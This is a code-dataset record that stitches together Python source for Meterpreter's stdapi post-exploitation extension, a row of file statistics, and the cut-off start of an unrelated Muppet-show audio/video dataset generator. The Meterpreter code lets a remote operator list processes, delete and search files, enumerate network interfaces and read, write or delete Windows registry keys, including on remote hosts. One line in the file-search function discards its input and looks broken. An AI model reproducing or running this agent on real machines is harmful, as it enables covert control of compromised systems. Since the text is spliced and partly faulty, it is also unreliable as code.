exe_path = ''
process_username = ''
process_token_user = get_token_user(proc_h)
if process_token_user:
process_username = get_username_from_token(process_token_user) or ''
parch = windll_GetNativeSystemInfo()
is_wow64 = ctypes.c_ubyte()
is_wow64.value = 0
if hasattr(k32, 'IsWow64Process'):
if k32.IsWow64Process(proc_h, ctypes.byref(is_wow64)):
if is_wow64.value:
parch = PROCESS_ARCH_X86
pgroup = bytes()
pgroup += tlv_pack(TLV_TYPE_PID, pe32.th32ProcessID)
pgroup += tlv_pack(TLV_TYPE_PARENT_PID, pe32.th32ParentProcessID)
pgroup += tlv_pack(TLV_TYPE_USER_NAME, process_username)
pgroup += tlv_pack(TLV_TYPE_PROCESS_NAME, pe32.szExeFile)
pgroup += tlv_pack(TLV_TYPE_PROCESS_PATH, exe_path)
pgroup += tlv_pack(TLV_TYPE_PROCESS_ARCH, parch)
response += tlv_pack(TLV_TYPE_PROCESS_GROUP, pgroup)
result = k32.Process32Next(proc_snap, ctypes.byref(pe32))
k32.CloseHandle(proc_h)
k32.CloseHandle(proc_snap)
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_sys_process_get_processes(request, response):
if os.path.isdir('/proc'):
return stdapi_sys_process_get_processes_via_proc(request, response)
elif has_windll:
return stdapi_sys_process_get_processes_via_windll(request, response)
else:
return stdapi_sys_process_get_processes_via_ps(request, response)
return ERROR_FAILURE, response
@meterpreter.register_function
def stdapi_fs_chdir(request, response):
wd = packet_get_tlv(request, TLV_TYPE_DIRECTORY_PATH)['value']
os.chdir(unicode(wd))
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_fs_delete(request, response):
file_path = packet_get_tlv(request, TLV_TYPE_FILE_NAME)['value']
os.unlink(unicode(file_path))
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_fs_delete_dir(request, response):
dir_path = packet_get_tlv(request, TLV_TYPE_DIRECTORY_PATH)['value']
dir_path = unicode(dir_path)
if os.path.islink(dir_path):
del_func = os.unlink
else:
del_func = shutil.rmtree
del_func(dir_path)
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_fs_delete_file(request, response):
file_path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
os.unlink(unicode(file_path))
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_fs_file_expand_path(request, response):
path_tlv = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
if has_windll:
path_tlv = ctypes.create_string_buffer(bytes(path_tlv, 'UTF-8'))
path_out = (ctypes.c_char * 4096)()
path_out_len = ctypes.windll.kernel32.ExpandEnvironmentStringsA(ctypes.byref(path_tlv), ctypes.byref(path_out), ctypes.sizeof(path_out))
result = str(ctypes.string_at(path_out))
elif path_tlv == '%COMSPEC%':
result = '/bin/sh'
elif path_tlv in ['%TEMP%', '%TMP%']:
result = '/tmp'
else:
result = os.getenv(path_tlv, path_tlv)
if not result:
return ERROR_FAILURE, response
response += tlv_pack(TLV_TYPE_FILE_PATH, result)
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_fs_file_move(request, response):
oldname = packet_get_tlv(request, TLV_TYPE_FILE_NAME)['value']
newname = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
os.rename(unicode(oldname), unicode(newname))
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_fs_getwd(request, response):
if hasattr(os, 'getcwdu'):
wd = os.getcwdu()
else:
wd = os.getcwd()
response += tlv_pack(TLV_TYPE_DIRECTORY_PATH, wd)
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_fs_ls(request, response):
path = packet_get_tlv(request, TLV_TYPE_DIRECTORY_PATH)['value']
path = os.path.abspath(unicode(path))
glob = '*'
if any((c in ['*','[','?']) for c in path):
glob = os.path.basename(path)
path = os.path.dirname(path)
for file_name in filter(lambda f: fnmatch.fnmatch(f, glob), os.listdir(path)):
file_path = os.path.join(path, file_name)
response += tlv_pack(TLV_TYPE_FILE_NAME, file_name)
response += tlv_pack(TLV_TYPE_FILE_PATH, file_path)
response += tlv_pack(TLV_TYPE_STAT_BUF, get_stat_buffer(file_path))
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_fs_md5(request, response):
try:
import hashlib
m = hashlib.md5()
except ImportError:
import md5
m = md5.new()
path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
m.update(open(path, 'rb').read())
response += tlv_pack(TLV_TYPE_FILE_HASH, m.digest())
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_fs_mkdir(request, response):
dir_path = packet_get_tlv(request, TLV_TYPE_DIRECTORY_PATH)['value']
dir_path = unicode(dir_path)
if not os.path.isdir(dir_path):
os.mkdir(dir_path)
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_fs_search(request, response):
search_root = packet_get_tlv(request, TLV_TYPE_SEARCH_ROOT).get('value', '.')
search_root = ('' or '.') # sometimes it's an empty string
search_root = unicode(search_root)
glob = packet_get_tlv(request, TLV_TYPE_SEARCH_GLOB)['value']
recurse = packet_get_tlv(request, TLV_TYPE_SEARCH_RECURSE)['value']
if recurse:
for root, dirs, files in os.walk(search_root):
for f in filter(lambda f: fnmatch.fnmatch(f, glob), files):
file_tlv = ''
file_tlv += tlv_pack(TLV_TYPE_FILE_PATH, root)
file_tlv += tlv_pack(TLV_TYPE_FILE_NAME, f)
file_tlv += tlv_pack(TLV_TYPE_FILE_SIZE, os.stat(os.path.join(root, f)).st_size)
response += tlv_pack(TLV_TYPE_SEARCH_RESULTS, file_tlv)
else:
for f in filter(lambda f: fnmatch.fnmatch(f, glob), os.listdir(search_root)):
file_tlv = ''
file_tlv += tlv_pack(TLV_TYPE_FILE_PATH, search_root)
file_tlv += tlv_pack(TLV_TYPE_FILE_NAME, f)
file_tlv += tlv_pack(TLV_TYPE_FILE_SIZE, os.stat(os.path.join(search_root, f)).st_size)
response += tlv_pack(TLV_TYPE_SEARCH_RESULTS, file_tlv)
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_fs_separator(request, response):
response += tlv_pack(TLV_TYPE_STRING, os.sep)
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_fs_sha1(request, response):
try:
import hashlib
m = hashlib.sha1()
except ImportError:
import sha
m = sha.new()
path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
m.update(open(path, 'rb').read())
response += tlv_pack(TLV_TYPE_FILE_HASH, m.digest())
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_fs_stat(request, response):
path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
st_buf = get_stat_buffer(unicode(path))
response += tlv_pack(TLV_TYPE_STAT_BUF, st_buf)
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_net_config_get_interfaces(request, response):
if hasattr(socket, 'AF_NETLINK') and hasattr(socket, 'NETLINK_ROUTE'):
interfaces = stdapi_net_config_get_interfaces_via_netlink()
elif has_osxsc:
interfaces = stdapi_net_config_get_interfaces_via_osxsc()
elif has_windll:
interfaces = stdapi_net_config_get_interfaces_via_windll()
else:
return ERROR_FAILURE, response
for iface_info in interfaces:
iface_tlv = bytes()
iface_tlv += tlv_pack(TLV_TYPE_MAC_NAME, iface_info.get('name', 'Unknown'))
iface_tlv += tlv_pack(TLV_TYPE_MAC_ADDRESS, iface_info.get('hw_addr', '\x00\x00\x00\x00\x00\x00'))
if 'mtu' in iface_info:
iface_tlv += tlv_pack(TLV_TYPE_INTERFACE_MTU, iface_info['mtu'])
if 'flags' in iface_info:
iface_tlv += tlv_pack(TLV_TYPE_INTERFACE_FLAGS, iface_info['flags'])
iface_tlv += tlv_pack(TLV_TYPE_INTERFACE_INDEX, iface_info['index'])
for address in iface_info.get('addrs', []):
iface_tlv += tlv_pack(TLV_TYPE_IP, address[1])
if isinstance(address[2], (int, long)):
iface_tlv += tlv_pack(TLV_TYPE_IP_PREFIX, address[2])
else:
iface_tlv += tlv_pack(TLV_TYPE_NETMASK, address[2])
response += tlv_pack(TLV_TYPE_NETWORK_INTERFACE, iface_tlv)
return ERROR_SUCCESS, response
def stdapi_net_config_get_interfaces_via_netlink():
rta_align = lambda l: l+3 & ~3
iface_flags = {
0x0001: 'UP',
0x0002: 'BROADCAST',
0x0008: 'LOOPBACK',
0x0010: 'POINTTOPOINT',
0x0040: 'RUNNING',
0x0100: 'PROMISC',
0x1000: 'MULTICAST'
}
iface_flags_sorted = list(iface_flags.keys())
# Dictionaries don't maintain order
iface_flags_sorted.sort()
interfaces = {}
responses = netlink_request(RTM_GETLINK)
for res_data in responses:
iface = cstruct_unpack(IFINFOMSG, res_data)
iface_info = {'index':iface.index}
flags = []
for flag in iface_flags_sorted:
if (iface.flags & flag):
flags.append(iface_flags[flag])
iface_info['flags'] = ' '.join(flags)
cursor = ctypes.sizeof(IFINFOMSG)
while cursor < len(res_data):
attribute = cstruct_unpack(RTATTR, res_data[cursor:])
at_len = attribute.len
attr_data = res_data[cursor + ctypes.sizeof(RTATTR):(cursor + at_len)]
cursor += rta_align(at_len)
if attribute.type == IFLA_ADDRESS:
iface_info['hw_addr'] = attr_data
elif attribute.type == IFLA_IFNAME:
iface_info['name'] = attr_data
elif attribute.type == IFLA_MTU:
iface_info['mtu'] = struct.unpack('<I', attr_data)[0]
interfaces[iface.index] = iface_info
responses = netlink_request(RTM_GETADDR)
for res_data in responses:
iface = cstruct_unpack(IFADDRMSG, res_data)
if not iface.family in (socket.AF_INET, socket.AF_INET6):
continue
iface_info = interfaces.get(iface.index, {})
cursor = ctypes.sizeof(IFADDRMSG)
while cursor < len(res_data):
attribute = cstruct_unpack(RTATTR, res_data[cursor:])
at_len = attribute.len
attr_data = res_data[cursor + ctypes.sizeof(RTATTR):(cursor + at_len)]
cursor += rta_align(at_len)
if attribute.type == IFA_ADDRESS:
nm_bits = iface.prefixlen
if iface.family == socket.AF_INET:
netmask = struct.pack('!I', calculate_32bit_netmask(nm_bits))
else:
if nm_bits >= 96:
netmask = struct.pack('!iiiI', -1, -1, -1, calculate_32bit_netmask(nm_bits))
elif nm_bits >= 64:
netmask = struct.pack('!iiII', -1, -1, calculate_32bit_netmask(nm_bits), 0)
elif nm_bits >= 32:
netmask = struct.pack('!iIII', -1, calculate_32bit_netmask(nm_bits), 0, 0)
else:
netmask = struct.pack('!IIII', calculate_32bit_netmask(nm_bits), 0, 0, 0)
addr_list = iface_info.get('addrs', [])
addr_list.append((iface.family, attr_data, netmask))
iface_info['addrs'] = addr_list
elif attribute.type == IFA_LABEL:
iface_info['name'] = attr_data
interfaces[iface.index] = iface_info
return interfaces.values()
def stdapi_net_config_get_interfaces_via_osxsc():
ds = osxsc.SCDynamicStoreCreate(None, 'GetInterfaceInformation', None, None)
entities = []
entities.append(osxsc.SCDynamicStoreKeyCreateNetworkInterfaceEntity(None, osxsc.kSCDynamicStoreDomainState, osxsc.kSCCompAnyRegex, osxsc.kSCEntNetIPv4))
entities.append(osxsc.SCDynamicStoreKeyCreateNetworkInterfaceEntity(None, osxsc.kSCDynamicStoreDomainState, osxsc.kSCCompAnyRegex, osxsc.kSCEntNetIPv6))
patterns = osxsc.CFArrayCreate(None, entities, len(entities), osxsc.kCFTypeArrayCallBacks)
values = osxsc.SCDynamicStoreCopyMultiple(ds, None, patterns)
interfaces = {}
for key, value in values.items():
iface_name = key.split('/')[3]
iface_info = interfaces.get(iface_name, {})
iface_info['name'] = str(iface_name)
if key.endswith('IPv4'):
family = socket.AF_INET
elif key.endswith('IPv6'):
family = socket.AF_INET6
else:
continue
iface_addresses = iface_info.get('addrs', [])
for idx in range(len(value['Addresses'])):
if family == socket.AF_INET:
iface_addresses.append((family, inet_pton(family, value['Addresses'][idx]), inet_pton(family, value['SubnetMasks'][idx])))
else:
iface_addresses.append((family, inet_pton(family, value['Addresses'][idx]), value['PrefixLength'][idx]))
iface_info['addrs'] = iface_addresses
interfaces[iface_name] = iface_info
for iface_ref in osxsc.SCNetworkInterfaceCopyAll():
iface_name = osxsc.SCNetworkInterfaceGetBSDName(iface_ref)
if not iface_name in interfaces:
iface_type = osxsc.SCNetworkInterfaceGetInterfaceType(iface_ref)
if not iface_type in ['Ethernet', 'IEEE80211']:
continue
interfaces[iface_name] = {'name': str(iface_name)}
iface_info = interfaces[iface_name]
mtu = osxsc.SCNetworkInterfaceCopyMTU(iface_ref, None, None, None)[1]
iface_info['mtu'] = mtu
hw_addr = osxsc.SCNetworkInterfaceGetHardwareAddressString(iface_ref)
if hw_addr:
hw_addr = hw_addr.replace(':', '')
hw_addr = hw_addr.decode('hex')
iface_info['hw_addr'] = hw_addr
ifnames = list(interfaces.keys())
ifnames.sort()
for iface_name, iface_info in interfaces.items():
iface_info['index'] = ifnames.index(iface_name)
return interfaces.values()
def stdapi_net_config_get_interfaces_via_windll():
iphlpapi = ctypes.windll.iphlpapi
if not hasattr(iphlpapi, 'GetAdaptersAddresses'):
return stdapi_net_config_get_interfaces_via_windll_mib()
Flags = (GAA_FLAG_INCLUDE_PREFIX | GAA_FLAG_SKIP_DNS_SERVER | GAA_FLAG_SKIP_MULTICAST | GAA_FLAG_SKIP_ANYCAST)
AdapterAddresses = ctypes.c_void_p()
SizePointer = ctypes.c_ulong()
SizePointer.value = 0
iphlpapi.GetAdaptersAddresses(socket.AF_UNSPEC, Flags, None, AdapterAddresses, ctypes.byref(SizePointer))
AdapterAddressesData = (ctypes.c_uint8 * SizePointer.value)()
iphlpapi.GetAdaptersAddresses(socket.AF_UNSPEC, Flags, None, ctypes.byref(AdapterAddressesData), ctypes.byref(SizePointer))
AdapterAddresses = ctypes.string_at(ctypes.byref(AdapterAddressesData), SizePointer.value)
AdapterAddresses = cstruct_unpack(IP_ADAPTER_ADDRESSES, AdapterAddresses)
if AdapterAddresses.u.s.Length <= 72:
return stdapi_net_config_get_interfaces_via_windll_mib()
win_version = windll_GetVersion()
interfaces = []
pAdapterAddresses = ctypes.byref(AdapterAddresses)
while pAdapterAddresses:
AdapterAddresses = cstruct_unpack(IP_ADAPTER_ADDRESSES, pAdapterAddresses)
pAdapterAddresses = AdapterAddresses.Next
pFirstPrefix = AdapterAddresses.FirstPrefix
iface_info = {}
iface_info['index'] = AdapterAddresses.u.s.IfIndex
if AdapterAddresses.PhysicalAddressLength:
iface_info['hw_addr'] = ctypes.string_at(ctypes.byref(AdapterAddresses.PhysicalAddress), AdapterAddresses.PhysicalAddressLength)
iface_desc = ctypes.wstring_at(AdapterAddresses.Description)
if not is_str(iface_desc):
iface_desc = str(iface_desc)
iface_info['name'] = iface_desc
iface_info['mtu'] = AdapterAddresses.Mtu
pUniAddr = AdapterAddresses.FirstUnicastAddress
while pUniAddr:
UniAddr = cstruct_unpack(IP_ADAPTER_UNICAST_ADDRESS, pUniAddr)
pUniAddr = UniAddr.Next
address = cstruct_unpack(SOCKADDR, UniAddr.Address.lpSockaddr)
if not address.sa_family in (socket.AF_INET, socket.AF_INET6):
continue
prefix = 0
if win_version.dwMajorVersion >= 6:
prefix = UniAddr.OnLinkPrefixLength
elif pFirstPrefix:
ip_adapter_prefix = 'QPPIL'
prefix_data = ctypes.string_at(pFirstPrefix, struct.calcsize(ip_adapter_prefix))
prefix = struct.unpack(ip_adapter_prefix, prefix_data)[4]
iface_addresses = iface_info.get('addrs', [])
if address.sa_family == socket.AF_INET:
iface_addresses.append((socket.AF_INET, ctypes.string_at(ctypes.byref(address.sa_data), 6)[2:], prefix))
else:
iface_addresses.append((socket.AF_INET6, ctypes.string_at(ctypes.byref(address.sa_data), 22)[6:], prefix))
iface_info['addrs'] = iface_addresses
interfaces.append(iface_info)
return interfaces
def stdapi_net_config_get_interfaces_via_windll_mib():
iphlpapi = ctypes.windll.iphlpapi
table = (ctypes.c_uint8 * (ctypes.sizeof(MIB_IPADDRROW) * 33))()
pdwSize = ctypes.c_ulong()
pdwSize.value = ctypes.sizeof(table)
if (iphlpapi.GetIpAddrTable(ctypes.byref(table), ctypes.byref(pdwSize), True) != 0):
return None
interfaces = []
table_data = ctypes.string_at(table, pdwSize.value)
entries = struct.unpack('I', table_data[:4])[0]
table_data = table_data[4:]
for i in range(entries):
addrrow = cstruct_unpack(MIB_IPADDRROW, table_data)
ifrow = MIB_IFROW()
ifrow.dwIndex = addrrow.dwIndex
if iphlpapi.GetIfEntry(ctypes.byref(ifrow)) != 0:
continue
iface_info = {}
table_data = table_data[ctypes.sizeof(MIB_IPADDRROW):]
iface_info['index'] = addrrow.dwIndex
iface_info['addrs'] = [(socket.AF_INET, struct.pack('<I', addrrow.dwAddr), struct.pack('<I', addrrow.dwMask))]
if ifrow.dwPhysAddrLen:
iface_info['hw_addr'] = ctypes.string_at(ctypes.byref(ifrow.bPhysAddr), ifrow.dwPhysAddrLen)
if ifrow.dwDescrLen:
iface_info['name'] = ifrow.bDescr
iface_info['mtu'] = ifrow.dwMtu
interfaces.append(iface_info)
return interfaces
@meterpreter.register_function
def stdapi_net_resolve_host(request, response):
hostname = packet_get_tlv(request, TLV_TYPE_HOST_NAME)['value']
family = packet_get_tlv(request, TLV_TYPE_ADDR_TYPE)['value']
if family == WIN_AF_INET:
family = socket.AF_INET
elif family == WIN_AF_INET6:
family = socket.AF_INET6
else:
raise Exception('invalid family')
result = resolve_host(hostname, family)
response += tlv_pack(TLV_TYPE_IP, result['packed_address'])
response += tlv_pack(TLV_TYPE_ADDR_TYPE, result['family'])
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_net_resolve_hosts(request, response):
family = packet_get_tlv(request, TLV_TYPE_ADDR_TYPE)['value']
if family == WIN_AF_INET:
family = socket.AF_INET
elif family == WIN_AF_INET6:
family = socket.AF_INET6
else:
raise Exception('invalid family')
for hostname in packet_enum_tlvs(request, TLV_TYPE_HOST_NAME):
hostname = hostname['value']
try:
result = resolve_host(hostname, family)
except socket.error:
result = {'family':family, 'packed_address':''}
response += tlv_pack(TLV_TYPE_IP, result['packed_address'])
response += tlv_pack(TLV_TYPE_ADDR_TYPE, result['family'])
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_net_socket_tcp_shutdown(request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
how = packet_get_tlv(request, TLV_TYPE_SHUTDOWN_HOW).get('value', socket.SHUT_RDWR)
channel = meterpreter.channels[channel_id]
channel.shutdown(how)
return ERROR_SUCCESS, response
def _wreg_close_key(hkey):
ctypes.windll.advapi32.RegCloseKey(hkey)
@meterpreter.register_function_windll
def stdapi_registry_close_key(request, response):
_wreg_close_key(packet_get_tlv(request, TLV_TYPE_HKEY)['value'])
return ERROR_SUCCESS, response
@meterpreter.register_function_windll
def stdapi_registry_create_key(request, response):
root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8'))
permission = packet_get_tlv(request, TLV_TYPE_PERMISSION).get('value', winreg.KEY_ALL_ACCESS)
res_key = ctypes.c_void_p()
if ctypes.windll.advapi32.RegCreateKeyExA(root_key, ctypes.byref(base_key), 0, None, 0, permission, None, ctypes.byref(res_key), None) != ERROR_SUCCESS:
return error_result_windows(), response
response += tlv_pack(TLV_TYPE_HKEY, res_key.value)
return ERROR_SUCCESS, response
@meterpreter.register_function_windll
def stdapi_registry_delete_key(request, response):
root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8'))
flags = packet_get_tlv(request, TLV_TYPE_FLAGS)['value']
if (flags & DELETE_KEY_FLAG_RECURSIVE):
result = ctypes.windll.shlwapi.SHDeleteKeyA(root_key, ctypes.byref(base_key))
else:
result = ctypes.windll.advapi32.RegDeleteKeyA(root_key, ctypes.byref(base_key))
return result, response
@meterpreter.register_function_windll
def stdapi_registry_delete_value(request, response):
root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value']
value_name = ctypes.create_string_buffer(bytes(value_name, 'UTF-8'))
result = ctypes.windll.advapi32.RegDeleteValueA(root_key, ctypes.byref(value_name))
return result, response
def _wreg_enum_key(request, response, hkey):
ERROR_MORE_DATA = 0xea
ERROR_NO_MORE_ITEMS = 0x0103
name = (ctypes.c_char * 4096)()
index = 0
tries = 0
while True:
result = ctypes.windll.advapi32.RegEnumKeyA(hkey, index, name, ctypes.sizeof(name))
if result == ERROR_MORE_DATA:
if tries > 3:
break
name = (ctypes.c_char * (ctypes.sizeof(name) * 2))
tries += 1
continue
elif result == ERROR_NO_MORE_ITEMS:
result = ERROR_SUCCESS
break
elif result != ERROR_SUCCESS:
break
tries = 0
response += tlv_pack(TLV_TYPE_KEY_NAME, ctypes.string_at(name))
index += 1
return result, response
@meterpreter.register_function_windll
def stdapi_registry_enum_key(request, response):
hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
return _wreg_enum_key(request, response, hkey)
@meterpreter.register_function_windll
def stdapi_registry_enum_key_direct(request, response):
err, hkey = _wreg_open_key(request)
if err != ERROR_SUCCESS:
return err, response
ret = _wreg_enum_key(request, response, hkey)
_wreg_close_key(hkey)
return ret
def _wreg_enum_value(request, response, hkey):
ERROR_MORE_DATA = 0xea
ERROR_NO_MORE_ITEMS = 0x0103
name = (ctypes.c_char * 4096)()
name_sz = ctypes.c_uint32()
index = 0
tries = 0
while True:
name_sz.value = ctypes.sizeof(name)
result = ctypes.windll.advapi32.RegEnumValueA(hkey, index, name, ctypes.byref(name_sz), None, None, None, None)
if result == ERROR_MORE_DATA:
if tries > 3:
break
name = (ctypes.c_char * (ctypes.sizeof(name) * 3))
tries += 1
continue
elif result == ERROR_NO_MORE_ITEMS:
result = ERROR_SUCCESS
break
elif result != ERROR_SUCCESS:
break
tries = 0
response += tlv_pack(TLV_TYPE_VALUE_NAME, ctypes.string_at(name))
index += 1
return result, response
@meterpreter.register_function_windll
def stdapi_registry_enum_value(request, response):
hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
return _wreg_enum_value(request, response, hkey)
@meterpreter.register_function_windll
def stdapi_registry_enum_value_direct(request, response):
err, hkey = _wreg_open_key(request)
if err != ERROR_SUCCESS:
return err, response
ret = _wreg_enum_value(request, response, hkey)
_wreg_close_key(hkey)
return ret
@meterpreter.register_function_windll
def stdapi_registry_load_key(request, response):
root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)
sub_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)
file_name = packet_get_tlv(request, TLV_TYPE_FILE_PATH)
result = ctypes.windll.advapi32.RegLoadKeyA(root_key, sub_key, file_name)
return result, response
def _wreg_open_key(request):
root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8'))
permission = packet_get_tlv(request, TLV_TYPE_PERMISSION).get('value', winreg.KEY_ALL_ACCESS)
handle_id = ctypes.c_void_p()
if ctypes.windll.advapi32.RegOpenKeyExA(root_key, ctypes.byref(base_key), 0, permission, ctypes.byref(handle_id)) != ERROR_SUCCESS:
return error_result_windows(), 0
return ERROR_SUCCESS, handle_id.value
@meterpreter.register_function_windll
def stdapi_registry_open_key(request, response):
err, hkey = _wreg_open_key(request)
if err != ERROR_SUCCESS:
return err, response
response += tlv_pack(TLV_TYPE_HKEY, hkey)
return ERROR_SUCCESS, response
@meterpreter.register_function_windll
def stdapi_registry_open_remote_key(request, response):
target_host = packet_get_tlv(request, TLV_TYPE_TARGET_HOST)['value']
root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
result_key = ctypes.c_void_p()
if ctypes.windll.advapi32.RegConnectRegistry(target_host, root_key, ctypes.byref(result_key)) != ERROR_SUCCESS:
return error_result_windows(), response
response += tlv_pack(TLV_TYPE_HKEY, result_key.value)
return ERROR_SUCCESS, response
@meterpreter.register_function_windll
def stdapi_registry_query_class(request, response):
hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
value_data = (ctypes.c_char * 4096)()
value_data_sz = ctypes.c_uint32()
value_data_sz.value = ctypes.sizeof(value_data)
if ctypes.windll.advapi32.RegQueryInfoKeyA(hkey, value_data, ctypes.byref(value_data_sz), None, None, None, None, None, None, None, None, None) != ERROR_SUCCESS:
return error_result_windows(), response
response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data))
return ERROR_SUCCESS, response
def _query_value(request, response, hkey):
value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value']
value_name = ctypes.create_string_buffer(bytes(value_name, 'UTF-8'))
value_type = ctypes.c_uint32()
value_type.value = 0
value_data = (ctypes.c_ubyte * 4096)()
value_data_sz = ctypes.c_uint32()
value_data_sz.value = ctypes.sizeof(value_data)
result = ctypes.windll.advapi32.RegQueryValueExA(hkey, ctypes.byref(value_name), 0, ctypes.byref(value_type), value_data, ctypes.byref(value_data_sz))
if result == ERROR_SUCCESS:
response += tlv_pack(TLV_TYPE_VALUE_TYPE, value_type.value)
if value_type.value == winreg.REG_SZ:
response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data) + NULL_BYTE)
elif value_type.value == winreg.REG_DWORD:
value = value_data[:4]
value.reverse()
if sys.version_info[0] < 3:
value = ''.join(map(chr, value))
else:
value = bytes(value)
response += tlv_pack(TLV_TYPE_VALUE_DATA, value)
else:
response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data, value_data_sz.value))
return ERROR_SUCCESS, response
return error_result_windows(), response
@meterpreter.register_function_windll
def stdapi_registry_query_value(request, response):
hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
return _query_value(request, response, hkey)
@meterpreter.register_function_windll
def stdapi_registry_query_value_direct(request, response):
err, hkey = _wreg_open_key(request)
if err != ERROR_SUCCESS:
return err, response
ret = _query_value(request, response, hkey)
_wreg_close_key(hkey)
return ret
def _set_value(request, response, hkey):
value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value']
value_name = ctypes.create_string_buffer(bytes(value_name, 'UTF-8'))
value_type = packet_get_tlv(request, TLV_TYPE_VALUE_TYPE)['value']
value_data = packet_get_tlv(request, TLV_TYPE_VALUE_DATA)['value']
result = ctypes.windll.advapi32.RegSetValueExA(hkey, ctypes.byref(value_name), 0, value_type, value_data, len(value_data))
return result, response
@meterpreter.register_function_windll
def stdapi_registry_set_value(request, response):
hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
return _set_value(request, response, hkey)
@meterpreter.register_function_windll
def stdapi_registry_set_value_direct(request, response):
err, hkey = _wreg_open_key(request)
if err != ERROR_SUCCESS:
return err, response
ret = _set_value(request, response, hkey)
_wreg_close_key(hkey)
return ret
@meterpreter.register_function_windll
def stdapi_registry_unload_key(request, response):
root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
result = ctypes.windll.advapi32.RegUnLoadKeyA(root_key, base_key)
return result, response
| 38.330594 | 163 | 0.721417 | 8,254 | 60,639 | 4.936273 | 0.109402 | 0.045528 | 0.036447 | 0.025427 | 0.477003 | 0.398856 | 0.358556 | 0.302278 | 0.277121 | 0.253043 | 0 | 0.026593 | 0.17027 | 60,639 | 1,581 | 164 | 38.354839 | 0.783201 | 0.006794 | 0 | 0.30137 | 0 | 0 | 0.046995 | 0.007172 | 0 | 0 | 0.004064 | 0 | 0 | 1 | 0.049748 | false | 0.002163 | 0.023071 | 0 | 0.167988 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b5b00877dbcb9ed0163d73b29d1f955098e8789 | 17,120 | py | Python | SIM1/src/dataset_generator.py | mledl/mupped-show-classification | 7f3c50ff6e95d164cac8529ddaea95cddab4da13 | [
"Apache-2.0"
] | null | null | null | SIM1/src/dataset_generator.py | mledl/mupped-show-classification | 7f3c50ff6e95d164cac8529ddaea95cddab4da13 | [
"Apache-2.0"
] | null | null | null | SIM1/src/dataset_generator.py | mledl/mupped-show-classification | 7f3c50ff6e95d164cac8529ddaea95cddab4da13 | [
"Apache-2.0"
] | null | null | null | import math
import random
import cv2
import glob
import librosa
import os
from pathlib import Path
from audio_extractor import extract_audio_snippets
character_map = {0: 'kermit_the_frog',
1: 'waldorf_and_statler',
2: 'pig',
3: 'swedish_chef',
4: 'none'}
file_map = {'Muppets-02-01-01.txt': 1,
'Muppets-02-04-04.txt': 2,
'Muppets-03-04-03.txt': 3}
video_base_path = '../../videos/'
ground_truth_files_base_path = '../../ground_truth/'
audio_snippet_path = '../../audio/'
mfcc_feature_file = '../../ground_truth/audio/mfcc.txt'
ground_truth_txt_files = ['../../ground_truth/Muppets-02-01-01/Muppets-02-01-01.txt',
'../../ground_truth/Muppets-02-04-04/Muppets-02-04-04.txt',
'../../ground_truth/Muppets-03-04-03/Muppets-03-04-03.txt']
def print_ground_truth_statistics(data_locations_dict):
"""
The aim of this method is to print statistics of the ground truth.
:param data_locations_dict: dict holding the ground truth location data
"""
character_location_map = {}
total_samples = 0
print('Number of samples per character in ground truth:')
for i in range(0, len(character_map)):
no_of_samples = 0
for key, data_locations in data_locations_dict.items():
character_location_map[key] = data_locations[i]
no_of_samples += len(data_locations[i])
total_samples += no_of_samples
